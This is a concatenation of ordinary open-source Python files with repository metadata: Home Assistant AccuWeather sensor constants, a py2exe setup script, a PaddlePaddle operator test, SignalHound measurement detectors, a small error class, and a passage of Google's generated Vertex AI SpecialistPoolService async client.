ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: False,
},
"Ceiling": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-fog",
ATTR_LABEL: "Cloud Ceiling",
ATTR_UNIT_METRIC: LENGTH_METERS,
ATTR_UNIT_IMPERIAL: LENGTH_FEET,
ATTR_ENABLED: True,
},
"CloudCover": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-cloudy",
ATTR_LABEL: "Cloud Cover",
ATTR_UNIT_METRIC: PERCENTAGE,
ATTR_UNIT_IMPERIAL: PERCENTAGE,
ATTR_ENABLED: False,
},
"DewPoint": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "Dew Point",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: False,
},
"RealFeelTemperature": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "RealFeel Temperature",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: True,
},
"RealFeelTemperatureShade": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "RealFeel Temperature Shade",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: False,
},
"Precipitation": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-rainy",
ATTR_LABEL: "Precipitation",
ATTR_UNIT_METRIC: LENGTH_MILLIMETERS,
ATTR_UNIT_IMPERIAL: LENGTH_INCHES,
ATTR_ENABLED: True,
},
"PressureTendency": {
ATTR_DEVICE_CLASS: "accuweather__pressure_tendency",
ATTR_ICON: "mdi:gauge",
ATTR_LABEL: "Pressure Tendency",
ATTR_UNIT_METRIC: None,
ATTR_UNIT_IMPERIAL: None,
ATTR_ENABLED: True,
},
"UVIndex": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-sunny",
ATTR_LABEL: "UV Index",
ATTR_UNIT_METRIC: UV_INDEX,
ATTR_UNIT_IMPERIAL: UV_INDEX,
ATTR_ENABLED: True,
},
"WetBulbTemperature": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "Wet Bulb Temperature",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: False,
},
"WindChillTemperature": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "Wind Chill Temperature",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: False,
},
"Wind": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-windy",
ATTR_LABEL: "Wind",
ATTR_UNIT_METRIC: SPEED_KILOMETERS_PER_HOUR,
ATTR_UNIT_IMPERIAL: SPEED_MILES_PER_HOUR,
ATTR_ENABLED: True,
},
"WindGust": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-windy",
ATTR_LABEL: "Wind Gust",
ATTR_UNIT_METRIC: SPEED_KILOMETERS_PER_HOUR,
ATTR_UNIT_IMPERIAL: SPEED_MILES_PER_HOUR,
ATTR_ENABLED: False,
},
}
|
kennedyshead/home-assistant
|
homeassistant/components/accuweather/const.py
|
Python
|
apache-2.0
| 10,736 | 0 |
from setuptools import setup
import py2exe
import os
import glob
__import__('gtk')
__import__('jinja2')
__import__('docutils')
setup_dict = dict(
name='regenerate',
version='1.0.0',
license='License.txt',
author='Donald N. Allingham',
author_email='dallingham@gmail.com',
description='Register editor for ASIC/FPGA designs',
long_description='Allows users to manange registers for '
'ASIC and FPGA designs. Capable of generating Verilog '
'RTL, test code, C and assembler header files, and documentation.',
packages=[
"regenerate",
"regenerate.db",
"regenerate.importers",
"regenerate.extras",
"regenerate.settings",
"regenerate.ui",
"regenerate.writers"
],
package_dir={
"regenerate" : "regenerate",
},
package_data={
'regenerate' : [
"data/ui/*.ui",
"data/media/*",
"data/help/*.rst",
"data/extra/*",
"data/*.*",
"writers/templates/*"
]
},
include_package_data=True,
url="https://github.com/dallingham/regenerate",
scripts=[
"bin/regenerate",
"bin/regbuild",
"bin/regupdate",
"bin/regxref",
"bin/regdiff"
],
classifiers=[
'Operating System :: POSIX', 'Programming Language :: Python :: 2.7',
'License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)',
'Topic :: Scientific/Engineering :: Electronic Design Automation (EDA)'
],
windows=[
{
"script" : "bin/regenerate",
"icon_resources" : [(1, "regenerate/data/media/flop.ico")]
}
],
options={
'py2exe': {
'includes' : 'cairo, pango, pangocairo, atk, gobject, gio, gtk.keysyms, jinja2',
'skip_archive' : True,
'dll_excludes': [
'MSVCP90.dll',
'api-ms-win-core-string-l1-1-0.dll',
'api-ms-win-core-registry-l1-1-0.dll',
'api-ms-win-core-errorhandling-l1-1-1.dll',
'api-ms-win-core-string-l2-1-0.dll',
'api-ms-win-core-profile-l1-1-0.dll',
'api-ms-win-core-processthreads-l1-1-2.dll',
'api-ms-win-core-libraryloader-l1-2-1.dll',
'api-ms-win-core-file-l1-2-1.dll',
'api-ms-win-security-base-l1-2-0.dll',
'api-ms-win-eventing-provider-l1-1-0.dll',
'api-ms-win-core-heap-l2-1-0.dll',
'api-ms-win-core-libraryloader-l1-2-0.dll',
'api-ms-win-core-localization-l1-2-1.dll',
'api-ms-win-core-sysinfo-l1-2-1.dll',
'api-ms-win-core-synch-l1-2-0.dll',
'api-ms-win-core-heap-l1-2-0.dll']
}
},
)
setup(**setup_dict)
|
dallingham/regenerate
|
setup-win.py
|
Python
|
gpl-2.0
| 3,108 | 0.003861 |
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from op_test import OpTest
from test_reorder_lod_tensor import convert_to_offset
from sequence.test_sequence_pool import compute_seqpool_sum, compute_seqpool_avg, compute_seqpool_sqrt
from test_cvm_op import cvm_compute
class TestFusionSeqPoolCVMConcatOp(OpTest):
def setUp(self):
self.w = 11
self.use_cvm = True
self.lods = [[[2, 3, 5]], [[1, 5, 2]]]
self.set_conf()
self.set_pooltype()
self.op_type = 'fusion_seqpool_cvm_concat'
self.axis = 1
bs = len(self.lods[0][0])
inputs = []
outs = []
# The cvm variable is not actually used.
cvm = np.array([[0.6, 0.4]]).astype("float32")
i = 0
for lod in self.lods:
assert bs == len(lod[0]), 'All lod size should be equal'
x = np.random.uniform(0.1, 1,
[sum(lod[0]), self.w]).astype('float32')
offset = convert_to_offset(lod)
out = np.zeros((bs, self.w)).astype('float32')
if self.pooltype == "SUM":
compute_seqpool_sum(x, offset, out)
out = cvm_compute(out, self.w, self.use_cvm)
elif self.pooltype == "AVERAGE":
compute_seqpool_avg(x, offset, out)
out = cvm_compute(out, self.w, self.use_cvm)
elif self.pooltype == "SQRT":
compute_seqpool_sqrt(x, offset, out)
out = cvm_compute(out, self.w, self.use_cvm)
else:
raise Exception("Unsupported pool type!")
inputs.append(('x_{0}'.format(i), (x, lod)))
outs.append(out)
i = i + 1
self.inputs = {'X': inputs, "CVM": cvm}
self.outputs = {'Out': np.concatenate(outs, axis=self.axis)}
self.attrs = {
'pooltype': self.pooltype,
'axis': self.axis,
}
def set_pooltype(self):
self.pooltype = "SUM"
def set_conf(self):
pass
def test_check_output(self):
self.check_output()
class TestFusionSeqPoolCVMConcatOpCase1(TestFusionSeqPoolCVMConcatOp):
def set_conf(self):
self.lods = [[[1]]]
class TestFusionSeqPoolCVMConcatOpCase2(TestFusionSeqPoolCVMConcatOp):
def set_conf(self):
self.lods = [[[1]], [[1]], [[1]]]
class TestFusionSeqPoolCVMConcatOpCase3(TestFusionSeqPoolCVMConcatOp):
def set_conf(self):
self.lods = [[[1, 3, 4, 6]]]
self.w = 10
class TestFusionSeqPoolCVMConcatOpCase4(TestFusionSeqPoolCVMConcatOp):
def set_conf(self):
self.lods = [[[2, 13, 4]], [[1, 1, 1]], [[5, 3, 1]], [[9, 10, 3]]]
self.w = 3
## test avg pool and sqrt
def create_test_avg_sqrt_class(parent):
class TestSeqPoolAvgCase(parent):
def set_pooltype(self):
self.pooltype = "AVERAGE"
class TestSeqPoolSqrtCase(parent):
def set_pooltype(self):
self.pooltype = "SQRT"
cls_name_avg = "{0}_{1}".format(parent.__name__, "avg")
cls_name_sqrt = "{0}_{1}".format(parent.__name__, "sqrt")
TestSeqPoolAvgCase.__name__ = cls_name_avg
TestSeqPoolSqrtCase.__name__ = cls_name_sqrt
globals()[cls_name_avg] = TestSeqPoolAvgCase
globals()[cls_name_sqrt] = TestSeqPoolSqrtCase
create_test_avg_sqrt_class(TestFusionSeqPoolCVMConcatOp)
create_test_avg_sqrt_class(TestFusionSeqPoolCVMConcatOpCase1)
create_test_avg_sqrt_class(TestFusionSeqPoolCVMConcatOpCase2)
create_test_avg_sqrt_class(TestFusionSeqPoolCVMConcatOpCase3)
create_test_avg_sqrt_class(TestFusionSeqPoolCVMConcatOpCase4)
if __name__ == '__main__':
unittest.main()
|
luotao1/Paddle
|
python/paddle/fluid/tests/unittests/test_fusion_seqpool_cvm_concat_op.py
|
Python
|
apache-2.0
| 4,299 | 0.000465 |
"""
SignalHound related detector functions
extracted from pycqed/measurement/detector_functions.py commit 0da380ad2adf2dc998f5effef362cdf264b87948
"""
import logging
import time
from packaging import version
import qcodes as qc
from pycqed.measurement.det_fncs.Base import Soft_Detector, Hard_Detector
from pycqed.measurement.waveform_control import pulse
from pycqed.measurement.waveform_control import element
from pycqed.measurement.waveform_control import sequence
# import instruments for type annotations
from pycqed.instrument_drivers.physical_instruments.USB_SA124B import SignalHound_USB_SA124B
log = logging.getLogger(__name__)
class Signal_Hound_fixed_frequency(Soft_Detector):
def __init__(
self,
signal_hound: SignalHound_USB_SA124B,
frequency=None,
Navg=1,
delay=0.1,
prepare_for_each_point=False,
prepare_function=None,
prepare_function_kwargs: dict = {}
):
super().__init__()
self.frequency = frequency
self.name = 'SignalHound_fixed_frequency'
self.value_names = ['Power']
self.value_units = ['dBm']
self.delay = delay
self.SH = signal_hound
if frequency is not None:
self.SH.frequency(frequency)
self.Navg = Navg
self.prepare_for_each_point = prepare_for_each_point
self.prepare_function = prepare_function
self.prepare_function_kwargs = prepare_function_kwargs
def acquire_data_point(self, **kw):
if self.prepare_for_each_point:
self.prepare()
time.sleep(self.delay)
if version.parse(qc.__version__) < version.parse('0.1.11'):
return self.SH.get_power_at_freq(Navg=self.Navg)
else:
self.SH.avg(self.Navg)
return self.SH.power()
def prepare(self, **kw):
if qc.__version__ < '0.1.11':
self.SH.prepare_for_measurement()
if self.prepare_function is not None:
self.prepare_function(**self.prepare_function_kwargs)
def finish(self, **kw):
self.SH.abort()
class Signal_Hound_sweeped_frequency(Hard_Detector):
def __init__(
self,
signal_hound: SignalHound_USB_SA124B,
Navg=1,
delay=0.1,
**kw
):
super().__init__()
self.name = 'SignalHound_fixed_frequency'
self.value_names = ['Power']
self.value_units = ['dBm']
self.delay = delay
self.SH = signal_hound
self.Navg = Navg
def acquire_data_point(self, **kw):
frequency = self.swp.pop()
self.SH.set('frequency', frequency)
self.SH.prepare_for_measurement()
time.sleep(self.delay)
return self.SH.get_power_at_freq(Navg=self.Navg)
def get_values(self):
return ([self.acquire_data_point()])
def prepare(self, sweep_points):
self.swp = list(sweep_points)
# self.SH.prepare_for_measurement()
def finish(self, **kw):
self.SH.abort()
class SH_mixer_skewness_det(Soft_Detector):
'''
Based on the "Signal_Hound_fixed_frequency" detector.
generates an AWG seq to measure sideband transmission
Inputs:
frequency (Hz)
QI_amp_ratio (parameter)
IQ_phase (parameter)
SH (instrument)
f_mod (Hz)
'''
def __init__(
self,
frequency,
QI_amp_ratio,
IQ_phase,
SH: SignalHound_USB_SA124B,
I_ch, Q_ch,
station,
Navg=1,
delay=0.1,
f_mod=10e6,
verbose=False,
**kw):
super(SH_mixer_skewness_det, self).__init__()
self.SH = SH
self.frequency = frequency
self.name = 'SignalHound_mixer_skewness_det'
self.value_names = ['Power']
self.value_units = ['dBm']
self.delay = delay
self.SH.frequency.set(frequency) # Accepts input in Hz
self.Navg = Navg
self.QI_amp_ratio = QI_amp_ratio
self.IQ_phase = IQ_phase
self.pulsar = station.pulsar
self.f_mod = f_mod
self.I_ch = I_ch
self.Q_ch = Q_ch
self.verbose = verbose
def acquire_data_point(self, **kw):
QI_ratio = self.QI_amp_ratio.get()
skewness = self.IQ_phase.get()
if self.verbose:
print('QI ratio: %.3f' % QI_ratio)
print('skewness: %.3f' % skewness)
self.generate_awg_seq(QI_ratio, skewness, self.f_mod)
self.pulsar.AWG.start()
time.sleep(self.delay)
return self.SH.get_power_at_freq(Navg=self.Navg)
def generate_awg_seq(self, QI_ratio, skewness, f_mod):
SSB_modulation_el = element.Element('SSB_modulation_el',
pulsar=self.pulsar)
cos_pulse = pulse.CosPulse(channel=self.I_ch, name='cos_pulse')
sin_pulse = pulse.CosPulse(channel=self.Q_ch, name='sin_pulse')
SSB_modulation_el.add(pulse.cp(cos_pulse, name='cos_pulse',
frequency=f_mod, amplitude=0.15,
length=1e-6, phase=0))
SSB_modulation_el.add(pulse.cp(sin_pulse, name='sin_pulse',
frequency=f_mod, amplitude=0.15 *
QI_ratio,
length=1e-6, phase=90 + skewness))
seq = sequence.Sequence('Sideband_modulation_seq')
seq.append(name='SSB_modulation_el', wfname='SSB_modulation_el',
trigger_wait=False)
self.pulsar.program_awgs(seq, SSB_modulation_el)
def prepare(self, **kw):
self.SH.prepare_for_measurement()
def finish(self, **kw):
self.SH.abort()
|
DiCarloLab-Delft/PycQED_py3
|
pycqed/measurement/det_fncs/hard/SignalHound.py
|
Python
|
mit
| 5,908 | 0.000508 |
import logging
class Error(Exception):
def __init__(self, message, data = {}):
self.message = message
self.data = data
def __str__(self):
return self.message + ": " + repr(self.data)
@staticmethod
def die(code, error, message = None):
if isinstance(error, Exception):
e = error
error = '{0}.{1}'.format(type(e).__module__, type(e).__name__)
message = str(e)
print 'Error: ' + error
if message:
print message
#logging.exception(message)
exit(code)
|
hiqdev/reppy
|
heppy/Error.py
|
Python
|
bsd-3-clause
| 580 | 0.010345 |
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import functools
import re
from typing import Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core.client_options import ClientOptions
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.api_core import operation as gac_operation # type: ignore
from google.api_core import operation_async # type: ignore
from google.cloud.aiplatform_v1.services.specialist_pool_service import pagers
from google.cloud.aiplatform_v1.types import operation as gca_operation
from google.cloud.aiplatform_v1.types import specialist_pool
from google.cloud.aiplatform_v1.types import specialist_pool as gca_specialist_pool
from google.cloud.aiplatform_v1.types import specialist_pool_service
from google.protobuf import empty_pb2 # type: ignore
from google.protobuf import field_mask_pb2 # type: ignore
from .transports.base import SpecialistPoolServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc_asyncio import SpecialistPoolServiceGrpcAsyncIOTransport
from .client import SpecialistPoolServiceClient
class SpecialistPoolServiceAsyncClient:
"""A service for creating and managing Customer SpecialistPools.
When customers start Data Labeling jobs, they can reuse/create
Specialist Pools to bring their own Specialists to label the
data. Customers can add/remove Managers for the Specialist Pool
on Cloud console, then Managers will get email notifications to
manage Specialists and tasks on CrowdCompute console.
"""
_client: SpecialistPoolServiceClient
DEFAULT_ENDPOINT = SpecialistPoolServiceClient.DEFAULT_ENDPOINT
DEFAULT_MTLS_ENDPOINT = SpecialistPoolServiceClient.DEFAULT_MTLS_ENDPOINT
specialist_pool_path = staticmethod(
SpecialistPoolServiceClient.specialist_pool_path
)
parse_specialist_pool_path = staticmethod(
SpecialistPoolServiceClient.parse_specialist_pool_path
)
common_billing_account_path = staticmethod(
SpecialistPoolServiceClient.common_billing_account_path
)
parse_common_billing_account_path = staticmethod(
SpecialistPoolServiceClient.parse_common_billing_account_path
)
common_folder_path = staticmethod(SpecialistPoolServiceClient.common_folder_path)
parse_common_folder_path = staticmethod(
SpecialistPoolServiceClient.parse_common_folder_path
)
common_organization_path = staticmethod(
SpecialistPoolServiceClient.common_organization_path
)
parse_common_organization_path = staticmethod(
SpecialistPoolServiceClient.parse_common_organization_path
)
common_project_path = staticmethod(SpecialistPoolServiceClient.common_project_path)
parse_common_project_path = staticmethod(
SpecialistPoolServiceClient.parse_common_project_path
)
common_location_path = staticmethod(
SpecialistPoolServiceClient.common_location_path
)
parse_common_location_path = staticmethod(
SpecialistPoolServiceClient.parse_common_location_path
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
SpecialistPoolServiceAsyncClient: The constructed client.
"""
return SpecialistPoolServiceClient.from_service_account_info.__func__(SpecialistPoolServiceAsyncClient, info, *args, **kwargs) # type: ignore
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
SpecialistPoolServiceAsyncClient: The constructed client.
"""
return SpecialistPoolServiceClient.from_service_account_file.__func__(SpecialistPoolServiceAsyncClient, filename, *args, **kwargs) # type: ignore
from_service_account_json = from_service_account_file
@classmethod
def get_mtls_endpoint_and_cert_source(
cls, client_options: Optional[ClientOptions] = None
):
"""Return the API endpoint and client cert source for mutual TLS.
The client cert source is determined in the following order:
(1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not "true", the
client cert source is None.
(2) if `client_options.client_cert_source` is provided, use the provided one; if the
default client cert source exists, use the default one; otherwise the client cert
source is None.
The API endpoint is determined in the following order:
(1) if `client_options.api_endpoint` if provided, use the provided one.
(2) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is "always", use the
default mTLS endpoint; if the environment variabel is "never", use the default API
endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise
use the default API endpoint.
More details can be found at https://google.aip.dev/auth/4114.
Args:
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. Only the `api_endpoint` and `client_cert_source` properties may be used
in this method.
Returns:
Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the
client cert source to use.
Raises:
google.auth.exceptions.MutualTLSChannelError: If any errors happen.
"""
return SpecialistPoolServiceClient.get_mtls_endpoint_and_cert_source(client_options) # type: ignore
@property
def transport(self) -> SpecialistPoolServiceTransport:
"""Returns the transport used by the client instance.
Returns:
SpecialistPoolServiceTransport: The transport used by the client instance.
"""
return self._client.transport
get_transport_class = functools.partial(
type(SpecialistPoolServiceClient).get_transport_class,
type(SpecialistPoolServiceClient),
)
def __init__(
self,
*,
credentials: ga_credentials.Credentials = None,
transport: Union[str, SpecialistPoolServiceTransport] = "grpc_asyncio",
client_options: ClientOptions = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the specialist pool service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.SpecialistPoolServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (ClientOptions): Custom options for the client. It
won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._client = SpecialistPoolServiceClient(
credentials=credentials,
transport=transport,
client_options=client_options,
client_info=client_info,
)
async def create_specialist_pool(
self,
request: Union[
specialist_pool_service.CreateSpecialistPoolRequest, dict
] = None,
*,
parent: str = None,
specialist_pool: gca_specialist_pool.SpecialistPool = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Creates a SpecialistPool.
.. code-block:: python
from google.cloud import aiplatform_v1
def sample_create_specialist_pool():
# Create a client
client = aiplatform_v1.SpecialistPoolServiceClient()
# Initialize request argument(s)
specialist_pool = aiplatform_v1.SpecialistPool()
specialist_pool.name = "name_value"
specialist_pool.display_name = "display_name_value"
request = aiplatform_v1.CreateSpecialistPoolRequest(
parent="parent_value",
specialist_pool=specialist_pool,
)
# Make the request
operation = client.create_specialist_pool(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.CreateSpecialistPoolRequest, dict]):
The request object. Request message for
[SpecialistPoolService.CreateSpecialistPool][google.cloud.aiplatform.v1.SpecialistPoolService.CreateSpecialistPool].
parent (:class:`str`):
Required. The parent Project name for the new
SpecialistPool. The form is
``projects/{project}/locations/{location}``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
specialist_pool (:class:`google.cloud.aiplatform_v1.types.SpecialistPool`):
Required. The SpecialistPool to
create.
This corresponds to the ``specialist_pool`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1.types.SpecialistPool` SpecialistPool represents customers' own workforce to work on their data
labeling jobs. It includes a group of specialist
managers and workers. Managers are responsible for
managing the workers in this pool as well as
customers' data labeling jobs associated with this
pool. Customers create specialist pool as well as
start data labeling jobs on Cloud, managers and
workers handle the jobs using CrowdCompute console.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, specialist_pool])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = specialist_pool_service.CreateSpecialistPoolRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if specialist_pool is not None:
request.specialist_pool = specialist_pool
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.create_specialist_pool,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
gca_specialist_pool.SpecialistPool,
metadata_type=specialist_pool_service.CreateSpecialistPoolOperationMetadata,
)
# Done; return the response.
return response
async def get_specialist_pool(
self,
request: Union[specialist_pool_service.GetSpecialistPoolRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> specialist_pool.SpecialistPool:
r"""Gets a SpecialistPool.
.. code-block:: python
from google.cloud import aiplatform_v1
def sample_get_specialist_pool():
# Create a client
client = aiplatform_v1.SpecialistPoolServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.GetSpecialistPoolRequest(
name="name_value",
)
# Make the request
response = client.get_specialist_pool(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.GetSpecialistPoolRequest, dict]):
The request object. Request message for
[SpecialistPoolService.GetSpecialistPool][google.cloud.aiplatform.v1.SpecialistPoolService.GetSpecialistPool].
name (:class:`str`):
Required. The name of the SpecialistPool resource. The
form is
``projects/{project}/locations/{location}/specialistPools/{specialist_pool}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.SpecialistPool:
SpecialistPool represents customers'
own workforce to work on their data
labeling jobs. It includes a group of
specialist managers and workers.
Managers are responsible for managing
the workers in this pool as well as
customers' data labeling jobs associated
with this pool. Customers create
specialist pool as well as start data
labeling jobs on Cloud, managers and
workers handle the jobs using
CrowdCompute console.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = specialist_pool_service.GetSpecialistPoolRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.get_specialist_pool,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
async def list_specialist_pools(
self,
request: Union[specialist_pool_service.ListSpecialistPoolsRequest, dict] = None,
*,
parent: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListSpecialistPoolsAsyncPager:
r"""Lists SpecialistPools in a Location.
.. code-block:: python
from google.cloud import aiplatform_v1
def sample_list_specialist_pools():
# Create a client
client = aiplatform_v1.SpecialistPoolServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.ListSpecialistPoolsRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_specialist_pools(request=request)
# Handle the response
for response in page_result:
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.ListSpecialistPoolsRequest, dict]):
The request object. Request message for
[SpecialistPoolService.ListSpecialistPools][google.cloud.aiplatform.v1.SpecialistPoolService.ListSpecialistPools].
parent (:class:`str`):
Required. The name of the SpecialistPool's parent
resource. Format:
``projects/{project}/locations/{location}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.services.specialist_pool_service.pagers.ListSpecialistPoolsAsyncPager:
Response message for
[SpecialistPoolService.ListSpecialistPools][google.cloud.aiplatform.v1.SpecialistPoolService.ListSpecialistPools].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = specialist_pool_service.ListSpecialistPoolsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_specialist_pools,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
